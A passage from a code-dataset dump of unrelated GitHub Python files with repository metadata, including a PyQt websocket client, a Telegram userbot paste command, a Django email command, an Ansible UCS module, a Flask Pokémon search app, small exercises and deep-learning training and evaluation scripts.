rare_emoji[key][\"count\"] = min\n\n if subreddits[key][emoji] > max:\n max = subreddits[key][emoji]\n top_emoji[key][\"top_emoji\"] = emoji\n top_emoji[key][\"count\"] = max\n\n df = pd.DataFrame.from_dict(top_emoji, orient='index')\n # add the row index as a column in the dataframe\n df.reset_index(inplace=True)\n df.rename(columns={'index': 'subreddit'}, inplace=True)\n print(df)\n df.to_csv('../graphs/top_emoji_table.csv', index_label='index', index=False)\n\n df2 = pd.DataFrame.from_dict(rare_emoji, orient='index')\n df2.reset_index(inplace=True)\n df2.rename(columns={'index': 'subreddit'}, inplace=True)\n print(df2)\n df2.to_csv('../graphs/rare_emoji_table.csv', index=False)\n\n\ndef main():\n # query_api()\n visualize()\n # emoji_number()\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bartschliam/affect","sub_path":"data_collection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11672050697","text":"import time\n\nfrom PyQt5.QtCore import pyqtSignal, QThread\nfrom websocket import WebSocketApp\n\nfrom utils.ws import WebsocketMessage\n\n\nclass WebsocketConnection(QThread):\n emitter = pyqtSignal(dict)\n\n def __init__(self):\n super().__init__()\n self.__connection = None\n self.start_time = time.perf_counter_ns()\n\n @property\n def connection(self):\n return self.__connection\n\n def on_message(self, ws, message):\n end_time = time.perf_counter_ns()\n print(f\"Time since last message: {(end_time - self.start_time) / 1e9:.4f} s\")\n self.start_time = end_time\n self.emitter.emit(WebsocketMessage.get(message))\n\n def on_error(self, ws, error):\n print(error)\n\n def on_close(self, ws, close_status_code, close_msg):\n print(\"Connection closed\")\n\n def on_open(self, ws):\n print(\"Connection opened\")\n\n def connect_to_server(self):\n self.__connection.on_open = self.on_open\n try:\n self.__connection.run_forever()\n except Exception as e:\n print(f\"Exception in WebSocket thread: {e}\")\n\n def run(self):\n self.__connection = WebSocketApp(\"ws://127.0.0.1:8000\",\n on_message=self.on_message,\n on_error=self.on_error,\n on_close=self.on_close)\n self.__connection.on_open = self.on_open\n try:\n self.__connection.run_forever()\n except Exception as e:\n print(f\"Exception in WebSocket thread: {e}\")\n","repo_name":"roxanazachman01/bachelor-thesis","sub_path":"n-body/connection/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30996166200","text":"\"\"\"IX.IO pastebin like site\nSyntax: .paste\"\"\"\nimport logging\nimport os\nfrom datetime import datetime\n\nimport requests\n\nfrom sample_config import Config\nfrom userbot import bot\nfrom userbot.util import admin_cmd\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\n\ndef progress(current, total):\n logger.info(\"Downloaded {} of {}\\nCompleted {}\".format(\n current, total, (current / total) * 100))\n\n\n@bot.on(admin_cmd(pattern=\"npaste ?(.*)\"))\nasync def _(event):\n if event.fwd_from:\n return\n start = datetime.now()\n if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):\n os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)\n input_str = event.pattern_match.group(1)\n message = \"SYNTAX: `.paste `\"\n if input_str:\n message = input_str\n elif event.reply_to_msg_id:\n previous_message = await event.get_reply_message()\n if previous_message.media:\n downloaded_file_name = await event.client.download_media(\n previous_message,\n Config.TMP_DOWNLOAD_DIRECTORY,\n progress_callback=progress\n )\n m_list = None\n with open(downloaded_file_name, \"rb\") as fd:\n m_list = fd.readlines()\n message = \"\".join(m.decode(\"UTF-8\") for m in m_list)\n os.remove(downloaded_file_name)\n else:\n message = previous_message.message\n if downloaded_file_name.endswith(\".py\"):\n # else:\n # message = \"SYNTAX: `.paste `\"\n py_file = \"\"\n py_file += \".py\"\n data = message\n key = requests.post('https://nekobin.com/api/documents',\n json={\"content\": data}).json().get('result').get('key')\n url = f'https://nekobin.com/{key}{py_file}'\n else:\n data = message\n key = requests.post('https://nekobin.com/api/documents',\n json={\"content\": data}).json().get('result').get('key')\n url = f'https://nekobin.com/{key}'\n\n reply_text = f'Nekofied to *Nekobin* : {url}'\n await event.edit(reply_text)\n\n# data = \"tets sgdfgklj kdgjld\"\n\n# key = requests.post('https://nekobin.com/api/documents', json={\"content\": data}).json().get('result').get('key')\n\n# url = f'https://nekobin.com/{key}'\n\n# reply_text = f'Nekofied to *Nekobin* : {url}'\n","repo_name":"muhammedfurkan/TelethonUserBot","sub_path":"userbot/modules/nekobin.py","file_name":"nekobin.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"31351638777","text":"import re\n\nfrom django.utils.html import strip_tags\nfrom django.utils import timezone\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.core.mail import send_mail\n\nfrom di_website.common.base import PageNotification\n\nclass Command(BaseCommand):\n \"\"\"\n Finds all active page notifications and sends them via email. Send notifications and then deleted.\n \"\"\"\n\n def handle(self, *args, **options):\n current_datetime = timezone.now()\n notifications = PageNotification.objects.filter(date_time__lte=current_datetime)\n\n for notification in notifications:\n page = notification.page.specific\n message = notification.message.replace('%page_title%', page.title).replace('%page_url%', page.full_url)\n email_list = notification.emails.split(',')\n send_mail(\n notification.title,\n None,\n 'no-reply@devinit.org',\n email_list,\n html_message=message,\n fail_silently=False,\n )\n notification.delete()\n","repo_name":"devinit/DIwebsite-redesign","sub_path":"di_website/common/management/commands/send_page_notifications.py","file_name":"send_page_notifications.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4743872467","text":"from pprint import pprint\nimport os\n \npath = os.path.join(os.getcwd(),'recipes.txt')\nwith open(path, encoding = \"utf-8\") as file:\n book_of_recipes = {}\n for recipe in file:\n recipe_name = recipe.strip()\n counter = int(file.readline().strip())\n temp_data = []\n for item in range(counter):\n name,quantity,units = file.readline().strip().split('|')\n temp_data.append({'name':name.strip(),'quantity':quantity.strip(),'units':units.strip()})\n book_of_recipes[recipe_name] = temp_data\n file.readline()\npprint (book_of_recipes,width=150)\nprint()\n \ndef list_of_products_by_dish (dishes, person_count):\n list_of_all_products ={}\n for dish in dishes:\n if dish in book_of_recipes:\n for product in book_of_recipes[dish]:\n if product['name'] in list_of_all_products:\n list_of_all_products[product['name']]['quantity'] += int(product['quantity']) * person_count\n else:\n list_of_all_products[product['name']] = {'units': product['units'],'quantity': int(product['quantity']) * person_count}\n\n \n print()\n pprint (list_of_all_products)\n \n \nlist_of_products_by_dish (['Омлет','Омлет'], 2)\n","repo_name":"DmitriyAg1967/git-tasck-2-lecturer-8","sub_path":"tasck-2-lecturer-8.py","file_name":"tasck-2-lecturer-8.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3092177336","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = r'''\n---\nmodule: ucs_query\n\nshort_description: Queries UCS Manager objects by class or distinguished name\n\ndescription:\n -Queries UCS Manager objects by class or distinguished name.\n\nextends_documentation_fragment: ucs\n\noptions:\n class_ids:\n description:\n - One or more UCS Manager Class IDs to query.\n - As a comma separated list\n type: str\n\n distinguished_names:\n description:\n - One or more UCS Manager Distinguished Names to query.\n - As a comma separated list\n type: str\n\n delegate_to:\n description:\n - Where the module will be run\n default: localhost\n type: str\n\nrequirements:\n - ucsmsdk\n\nauthor:\n - John McDonough (@movinalot)\n - CiscoUcs (@CiscoUcs)\nversion_added: \"2.10\"\n'''\n\nEXAMPLES = r'''\n- name: Query UCS Class ID\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n class_ids: computeBlade\n delegate_to: localhost\n\n- name: Query UCS Class IDs\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n class_ids: computeBlade, fabricVlan\n delegate_to: localhost\n\n- name: Query UCS Distinguished Name\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n distinguished_names: org-root\n delegate_to: localhost\n\n- name: Query UCS Distinguished Names\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n distinguished_names: org-root, sys/rack-unit-1, sys/chassis-1/blade-2\n delegate_to: localhost\n'''\n\nRETURN = r'''\n#\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.remote_management.ucs import UCSModule, ucs_argument_spec\n\n\ndef retrieve_class_id(class_id, ucs):\n return ucs.login_handle.query_classid(class_id)\n\n\ndef retrieve_distinguished_name(distinguished_name, ucs):\n return ucs.login_handle.query_dn(distinguished_name)\n\n\ndef make_mo_dict(ucs_mo):\n obj_dict = {}\n for mo_property in ucs_mo.prop_map.values():\n obj_dict[mo_property] = getattr(ucs_mo, mo_property)\n return obj_dict\n\n\ndef main():\n argument_spec = ucs_argument_spec\n argument_spec.update(\n class_ids=dict(type='str'),\n distinguished_names=dict(type='str'),\n delegate_to=dict(type='str', default='localhost'),\n )\n\n module = AnsibleModule(\n argument_spec,\n supports_check_mode=False,\n mutually_exclusive=[\n ['class_ids', 'distinguished_names'],\n ],\n )\n\n # UCSModule verifies ucsmsdk is present and exits on failure.\n # Imports are below for UCS object creation.\n ucs = UCSModule(module)\n err = False\n query_result = {}\n\n try:\n if module.params['class_ids']:\n class_ids = [\n x.strip() for x in module.params['class_ids'].split(',')\n ]\n for class_id in class_ids:\n query_result[class_id] = []\n ucs_mos = retrieve_class_id(class_id, ucs)\n if ucs_mos:\n for ucs_mo in ucs_mos:\n query_result[class_id].append(make_mo_dict(ucs_mo))\n\n ucs.result['objects'] = query_result\n\n elif module.params['distinguished_names']:\n distinguished_names = [\n x.strip()\n for x in module.params['distinguished_names'].split(',')\n ]\n for distinguished_name in distinguished_names:\n query_result[distinguished_name] = {}\n ucs_mo = retrieve_distinguished_name(distinguished_name, ucs)\n\n if ucs_mo:\n query_result[distinguished_name] = make_mo_dict(ucs_mo)\n\n ucs.result['objects'] = query_result\n\n except Exception as e:\n err = True\n ucs.result['msg'] = \"setup error: %s \" % str(e)\n\n if err:\n module.fail_json(**ucs.result)\n\n ucs.result['changed'] = False\n module.exit_json(**ucs.result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CiscoUcs/ucsm-ansible","sub_path":"library/ucs_query.py","file_name":"ucs_query.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"37"} +{"seq_id":"72988530027","text":"a=int(input(\"enter a value for factorial\"))\r\ntemp=a\r\nsum=0\r\nwhile (a):\r\n digitreminder=a%10\r\n print(\"digits are:\",digitreminder)\r\n fact = 1\r\n i=1\r\n while i<= digitreminder:\r\n fact=fact*i\r\n i+= 1\r\n print(fact)\r\n sum=sum+fact\r\n a = a // 10\r\nif temp==sum:\r\n print(temp,\"is a strong number\")\r\nelse:\r\n print(temp,\"is not a strong number\")\r\n","repo_name":"thahsinabdulla/Python","sub_path":"strong no.py","file_name":"strong no.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595642478","text":"\"\"\"\n Print DB content\n\"\"\"\nfrom peewee import *\nfrom act7_model import Person, Job, Department\nfrom pprint import pprint\n\ndef main():\n\n database = SqliteDatabase('act7.db')\n\n try:\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n query = (Person\n .select(Person, Job, Department)\n .join(Job, JOIN.INNER)\n .join(Department, JOIN.INNER)\n )\n\n for line in query:\n pprint(f'This employee {line.person_name} had this job {line.job.job_name} in {line.job.department.department_name} department')\n\n except Exception as e:\n print (e)\n\n finally:\n database.close()\n\nif __name__ == '__main__':\n main()","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/marc_charbo/assignment_7/activity_7/act7/print_db_content.py","file_name":"print_db_content.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28291099350","text":"\n#Albert Wan (same pokedex file as calvin chu)\n#SoftDev1 pd9\n#K11: Ay Mon Go Git It From Yer Flask\n#2020-03-09\n\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom pymongo import MongoClient\nfrom bson.json_util import loads\nimport pprint, numbers\n\nclient = MongoClient()\ncollection = db.pokemon\ndb = client.ShortCircuit\n\nif (collection.count() == 0):\n f = open(\"pokedex.json\",\"r\")\n response = f.read()\n data = loads(response)\n f.close()\n for post in data['pokemon']:\n collection.insert_one(post)\n\ndef getID(id):\n arr = []\n for x in (collection.find({\"id\" : id})):\n arr.append(x)\n return arr\ndef getNum(num):\n arr = []\n for x in (collection.find({\"num\" : num})):\n arr.append(x)\n\n return arr\ndef getName(name):\n arr = []\n for x in (collection.find({\"name\" : name})):\n arr.append(x)\n\n return arr\ndef getImg(img):\n arr = []\n for x in (collection.find({\"img\" : img})):\n arr.append(x)\n\n return arr\ndef getType(t):\n arr = []\n for x in (collection.find({\"type\" : {\"$in\" : [t]}})):\n arr.append(x)\n\n return arr\ndef getCandy(c):\n arr = []\n for x in (collection.find({\"candy\" : c})):\n arr.append(x)\n return arr\ndef getCandyCount(c):\n arr = []\n for x in (collection.find({\"candy_count\" : c})):\n arr.append(x)\n return arr\ndef getMaxSpawnChance(c):\n arr= []\n for x in (collection.find({\"spawn_chance\" : {\"$lte\" : c}})):\n arr.append(x)\n return arr\ndef getMaxAvgSpawns(s):\n arr=[]\n for x in (collection.find({\"avg_spawns\" : {\"$lte\" : s}})):\n arr.append(x)\n return arr\ndef getSpawnTime(t):\n arr=[]\n for x in (collection.find({\"spawn_time\" : t})):\n arr.append(x)\n\n return arr\ndef getMultipliers(m):\n arr=[]\n for x in (collection.find({\"multipliers\" : {\"$in\" : [m]}})):\n arr.append(x)\n return arr\ndef getWeakness(w):\n arr=[]\n for x in (collection.find({\"weaknesses\" : {\"$in\" : [w]}})):\n arr.append(x)\n return arr\ndef getNextEvNum(n):\n arr=[]\n for x in (collection.find({\"next_evolution.num\" : n})):\n arr.append(x)\n return arr\ndef getNextEvName(n):\n arr=[]\n for x in (collection.find({\"next_evolution.name\" : n})):\n arr.append(x)\n return arr\ndef getPrevEvNum(n):\n arr=[]\n for x in (collection.find({\"prev_evolution.num\" : n})):\n arr.append(x)\n return arr\ndef getPrevEvName(n):\n arr=[]\n for x in (collection.find({\"prev_evolution.name\" : n})):\n arr.append(x)\n return arr\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef root():\n if (len(request.args) == 0 ):\n return render_template('poke.html')\n if (len(request.args['input']) == 0):\n return render_template('poke.html')\n else:\n if (request.args['search'] == 'id'):\n return render_template('app.html', var = getID(int(request.args['input'])))\n if (request.args['search'] == 'num'):\n return render_template('app.html', var = getNum(request.args['input']))\n if (request.args['search'] == 'name'):\n return render_template('app.html', var = getName(request.args['input']))\n if (request.args['search'] == 'img'):\n return render_template('app.html', var = getImg(request.args['input']))\n if (request.args['search'] == 'type'):\n return render_template('app.html', var = getType(request.args['input']))\n if (request.args['search'] == 'candy'):\n return render_template('app.html', var = getCandy(request.args['input']))\n elif (request.args['search'] == 'weakness'):\n return render_template('app.html', var = getWeakness(request.args['input']))\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"bertw2002/workRepo","sub_path":"11_mongoflask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42629684357","text":"with open('input.txt') as file:\r\n s = file.read().splitlines()[:9]\r\n from itertools import zip_longest\r\n\r\n transposed = list(zip_longest(*s))\r\n transposed_list = [str(tuples) for tuples in transposed]\r\n stripped_transposed_list = []\r\n for line in transposed_list:\r\n for ch in line:\r\n if not ch.isalpha():\r\n line = line.replace(ch, '').strip('')\r\n\r\n if len(line) != 0:\r\n if line != 'None':\r\n stripped_transposed_list.append(line)\r\n\r\n loading_area = {}\r\n for count, ele in enumerate(stripped_transposed_list, 1):\r\n loading_area[count] = [*ele]\r\n\r\nfile.close()\r\n\r\n\r\nwith open('input.txt') as file:\r\n transposed_list = (file.read()).splitlines()[10:]\r\n\r\nfor line in transposed_list:\r\n how_many, stack_from, stack_to = [int(line.split(' ')[i]) for i in (1, 3, 5)]\r\n gcc = loading_area[stack_from][:how_many]\r\n # comment out gcc.reverse for '`9001` upgrade' a.k.a. part 2\r\n gcc.reverse()\r\n loading_area[stack_to][:0] = gcc\r\n del loading_area[stack_from][:how_many]\r\n\r\nanswer = \"\"\r\nx = 1\r\nfor k in loading_area.items():\r\n answer += loading_area[x][0]\r\n x += 1\r\n\r\nprint(answer)\r\n","repo_name":"setvobis/advent-of-code-2022","sub_path":"d5.py","file_name":"d5.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14990943106","text":"from turtle import Turtle, Screen\nimport random\n\nscreen = Screen()\nscreen.setup(width=500, height=400)\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nnames = [\"lucho\", \"maria\", \"jose\", \"juan\", \"pedro\", \"carlos\"]\nall_turtles = []\ny_value = -150\n\n\n# Set turtles in their right positions\ndef set_positions(y_val):\n # is_race_on = False\n\n for turtle_index in range(0, 6):\n new_turtle = Turtle(shape=\"turtle\", )\n new_turtle.color(colors[turtle_index])\n new_turtle.penup()\n new_turtle.goto(x=-230, y=y_val)\n\n all_turtles.append(new_turtle)\n\n y_val += 60\n\n get_bet()\n\n\ndef get_bet():\n user_bet = (screen.textinput(title=\"Make your bet!\",\n prompt=\"Which turtle will win the race? Enter a color: \"))\n\n if user_bet in colors:\n print(f\"Your money is on: {user_bet}. Good Luck!\")\n else:\n print(\"Wrong color name, try again\")\n get_bet()\n\n is_race_on = True\n\n while is_race_on:\n for t in all_turtles:\n if t.xcor() > 230:\n is_race_on = False\n winner_color = t.pencolor()\n if winner_color == user_bet:\n print(f\"You Won! The {winner_color} turtle won the race!\")\n else:\n print(f\"You Lost! The {winner_color} turtle won the race!\")\n\n rand_distance = random.randint(0, 10)\n t.forward(rand_distance)\n\n\nset_positions(y_value)\nscreen.exitonclick()\n","repo_name":"LFCamacho-dev/PythonTurtleRace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7830270870","text":"from torch import nn\nfrom torch.utils.data import dataset\nfrom torch.utils.data import dataloader\nimport torchvision.datasets as dset\nimport torch.optim\nimport torchvision.transforms as transforms\nfrom tqdm.auto import tqdm\nimport numpy as np\nimport json\n\nfrom model import AlexNet\nimport util\n'''\nfine tune the fully connected layer firstly\n'''\n\n\nlearning_rate=0.000001\nTESTING_MODE=0\nn_epochs=150#150\n\ntrain_loader,validation_loader,test_loader=util.load_transformd_CIFAR10_data()\n\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nmodel=AlexNet()\npath='./lr0.001_adam_l2_1e-5/90_checkpoint'\nepoch,model_state_dict,optimizer_state_dict,loss= util.load_check_point(path)\n\nmodel.load_state_dict(model_state_dict)\n\nmodel.to(device)\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5)\noptimizer.load_state_dict(optimizer_state_dict)\n\n\n\n\nlist_train_acc=[]\nlist_val_acc=[]\nwhile epoch None:\n assert cfg[\"parameter\"][\"epochs\"] > 0\n assert cfg[\"experiment\"][\"batches\"] > 0\n assert 1. > cfg[\"parameter\"][\"momentum\"] > 0.\n assert cfg[\"parameter\"][\"warmup_epochs\"] >= 0\n\n assert cfg[\"experiment\"][\"base_cnn\"] in {\"resnet18\", \"resnet50\"}\n assert cfg[\"experiment\"][\"lr\"] > 0.\n assert cfg[\"experiment\"][\"decay\"] >= 0.\n\n\ndef convert_vectors(\n cfg: OmegaConf, data_loader, model: ContrastiveModel, device: torch.device\n):\n \"\"\"\n Convert experiment to feature representations.\n :param cfg: Hydra's config instance\n :param data_loader: Tata loader for raw experiment.\n :param model: Pre-trained instance\n :param device: PyTorch's device instance\n :return: Tuple of tensors: features and labels.\n \"\"\"\n model.eval()\n new_X = []\n new_y = []\n with torch.no_grad():\n for x_batches, y_batches in data_loader:\n if cfg[\"parameter\"][\"use_full_encoder\"]:\n fs = model(x_batches.to(device))\n else:\n fs = model.encode(x_batches.to(device))\n\n new_X.append(fs)\n new_y.append(y_batches)\n\n X = torch.cat(new_X).cpu()\n y = torch.cat(new_y).cpu()\n\n return X, y\n\n\ndef centroid_eval(\n data_loader: DataLoader, device: torch.device, classifier: CentroidClassifier, top_k: int = 5\n) -> tuple:\n \"\"\"\n :param data_loader: DataLoader of downstream task.\n :param device: PyTorch's device instance\n :param classifier: Instance of CentroidClassifier\n :param top_k: The number of top-k to calculate accuracy.\n :return: Tuple of top-1 accuracy and top-k accuracy.\n \"\"\"\n num_samples = len(data_loader.dataset)\n classifier.eval()\n top_1_correct = 0\n top_k_correct = 0\n with torch.no_grad():\n for x, y in data_loader:\n y = y.to(device)\n pred_top_k = torch.topk(classifier(x.to(device)), dim=1, k=top_k)[1]\n pred_top_1 = pred_top_k[:, 0]\n\n top_1_correct += pred_top_1.eq(y.view_as(pred_top_1)).sum().item()\n if top_k > 1:\n top_k_correct += (pred_top_k == y.view(len(y), 1)).sum().item()\n\n return top_1_correct / num_samples, top_k_correct / num_samples\n\n\ndef learnable_eval(\n cfg: OmegaConf,\n classifier,\n training_data_loader: DataLoader,\n val_data_loader: DataLoader,\n device: torch.device\n) -> tuple:\n \"\"\"\n :param cfg: Hydra's config instance\n :param classifier: Instance of classifier. Either linear or nonlinear\n :param training_data_loader: Training data loader for a downstream task\n :param val_data_loader: Validation data loader for a downstream task\n :param device: PyTorch's device instance\n :return: tuple of train acc, train top-k acc, train loss, val acc, val top-k acc, and val loss.\n \"\"\"\n\n def calculate_accuracies_loss(classifier, data_loader: DataLoader, device: torch.device, top_k: int = 5) -> tuple:\n \"\"\"\n Auxiliary function to calculate accuracies and loss.\n :param classifier: Instance of classifier. Either linear or nonlinear\n :param data_loader: Data loader for a downstream task\n :param device: PyTorch's device instance\n :param top_k: The number of top-k to calculate accuracy. Note `top_k <= 1` is same to top1.\n :return: Tuple of top 1 acc, top k acc, and loss.\n \"\"\"\n\n classifier.eval()\n total_loss = 0.\n top_1_correct = 0\n top_k_correct = 0\n num_samples = len(data_loader.dataset)\n\n with torch.no_grad():\n for x, y in data_loader:\n optimizer.zero_grad()\n y = y.to(device)\n outputs = classifier(x.to(device))\n total_loss += torch.nn.functional.cross_entropy(outputs, y, reduction=\"sum\").item()\n\n pred_top_k = torch.topk(outputs, dim=1, k=top_k)[1]\n pred_top_1 = pred_top_k[:, 0]\n\n top_1_correct += pred_top_1.eq(y.view_as(pred_top_1)).sum().item()\n if top_k > 1:\n top_k_correct += (pred_top_k == y.view(len(y), 1)).sum().item()\n else:\n top_k_correct += top_1_correct\n\n return top_1_correct / num_samples, top_k_correct / num_samples, total_loss / num_samples\n\n epochs = cfg[\"parameter\"][\"epochs\"]\n num_training_samples = len(training_data_loader.dataset)\n total_steps = cfg[\"parameter\"][\"epochs\"] * int(np.ceil(num_training_samples / cfg[\"experiment\"][\"batches\"]))\n\n classifier.train()\n cross_entropy_loss = torch.nn.CrossEntropyLoss()\n\n optimizer = torch.optim.SGD(\n params=classifier.parameters(),\n lr=calculate_initial_lr(cfg),\n momentum=cfg[\"parameter\"][\"momentum\"],\n nesterov=True,\n weight_decay=cfg[\"experiment\"][\"decay\"]\n )\n\n cos_lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=total_steps)\n\n train_accuracies = []\n train_top_k_accuracies = []\n val_accuracies = []\n val_top_k_accuracies = []\n train_losses = []\n val_losses = []\n for epoch in range(1, epochs + 1):\n sum_loss = 0.\n for x, y in training_data_loader:\n optimizer.zero_grad()\n\n outputs = classifier(x.to(device))\n loss = cross_entropy_loss(outputs, y.to(device))\n\n loss.backward()\n optimizer.step()\n\n cos_lr_scheduler.step()\n sum_loss += loss.item() * len(y)\n\n average_loss = sum_loss / num_training_samples\n logging.info(\"Epoch:{}/{} progress:{:.3f} loss:{:.3f}, lr:{:.7f}\".format(\n epoch, epochs, epoch / epochs, average_loss, optimizer.param_groups[0][\"lr\"]\n ))\n\n train_acc, train_top_k_acc, train_loss = calculate_accuracies_loss(classifier, training_data_loader, device)\n train_accuracies.append(train_acc)\n train_losses.append(train_loss)\n train_top_k_accuracies.append(train_top_k_acc)\n\n val_acc, val_top_k_acc, val_loss = calculate_accuracies_loss(classifier, val_data_loader, device)\n val_accuracies.append(val_acc)\n val_top_k_accuracies.append(val_top_k_acc)\n val_losses.append(val_loss)\n\n return train_accuracies, train_top_k_accuracies, train_losses, val_accuracies, val_top_k_accuracies, val_losses\n\n\n@hydra.main(config_path=\"conf\", config_name=\"eval\")\ndef main(cfg: OmegaConf):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n stream_handler.terminator = \"\"\n logger.addHandler(stream_handler)\n\n check_hydra_conf(cfg)\n\n seed = cfg[\"parameter\"][\"seed\"]\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n use_cuda = cfg[\"parameter\"][\"use_cuda\"] and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n logger.info(\"Using {}\".format(device))\n\n transform = transforms.Compose([transforms.ToTensor(), ])\n\n root = \"~/pytorch_datasets\"\n if cfg[\"experiment\"][\"name\"] == \"cifar10\":\n training_dataset = torchvision.datasets.CIFAR10(\n root=root, train=True, download=True, transform=transform\n )\n val_dataset = torchvision.datasets.CIFAR10(\n root=root, train=False, download=True, transform=transform\n )\n num_classes = 10\n elif cfg[\"experiment\"][\"name\"] == \"cifar100\":\n training_dataset = torchvision.datasets.CIFAR100(\n root=root, train=True, download=True, transform=transform\n )\n val_dataset = torchvision.datasets.CIFAR100(\n root=root, train=False, download=True, transform=transform\n )\n num_classes = 100\n else:\n assert cfg[\"experiment\"][\"name\"] in {\"cifar10\", \"cifar100\"}\n\n training_data_loader = DataLoader(\n dataset=training_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=True,\n )\n val_data_loader = DataLoader(\n dataset=val_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=False,\n )\n classification_results = {}\n\n top_k = cfg[\"parameter\"][\"top_k\"]\n for weights_path in Path(cfg[\"experiment\"][\"target_dir\"]).glob(\"*.pt\"):\n key = str(weights_path).split(\"/\")[-1]\n logger.info(\"Evaluation by using {}\".format(key))\n\n model = ContrastiveModel(base_cnn=cfg[\"experiment\"][\"base_cnn\"], d=cfg[\"parameter\"][\"d\"])\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model = model.to(device)\n\n state_dict = torch.load(weights_path)\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n\n # load weights trained on self-supervised task\n if use_cuda:\n model.load_state_dict(state_dict, strict=False)\n else:\n model.load_state_dict(state_dict, strict=False, map_location=device)\n\n downstream_training_dataset = DownstreamDataset(*convert_vectors(cfg, training_data_loader, model, device))\n downstream_val_dataset = DownstreamDataset(*convert_vectors(cfg, val_data_loader, model, device))\n\n downstream_training_data_loader = DataLoader(\n dataset=downstream_training_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=True,\n )\n downstream_val_data_loader = DataLoader(\n dataset=downstream_val_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=False,\n )\n\n if cfg[\"parameter\"][\"classifier\"] == \"centroid\":\n classifier = CentroidClassifier(\n weights=CentroidClassifier.create_weights(downstream_training_dataset, num_classes=num_classes).to(\n device)\n )\n train_acc, train_top_k_acc = centroid_eval(downstream_training_data_loader, device, classifier, top_k)\n val_acc, val_top_k_acc = centroid_eval(downstream_val_data_loader, device, classifier, top_k)\n\n classification_results[key] = {\n \"train_acc\": train_acc,\n \"train_top_{}_acc\".format(top_k): train_top_k_acc,\n \"val_acc\": val_acc,\n \"val_top_{}_acc\".format(top_k): val_top_k_acc\n }\n logger.info(\"train acc: {}, val acc: {}\".format(train_acc, val_acc))\n\n else:\n if cfg[\"parameter\"][\"use_full_encoder\"]:\n num_last_units = model.g[-1].out_features\n else:\n num_last_units = model.g[0].in_features\n\n if cfg[\"parameter\"][\"classifier\"] == \"linear\":\n classifier = LinearClassifier(num_last_units, num_classes).to(device)\n elif cfg[\"parameter\"][\"classifier\"].replace(\"-\", \"\") == \"nonlinear\":\n classifier = NonLinearClassifier(num_last_units, num_classes).to(device)\n\n 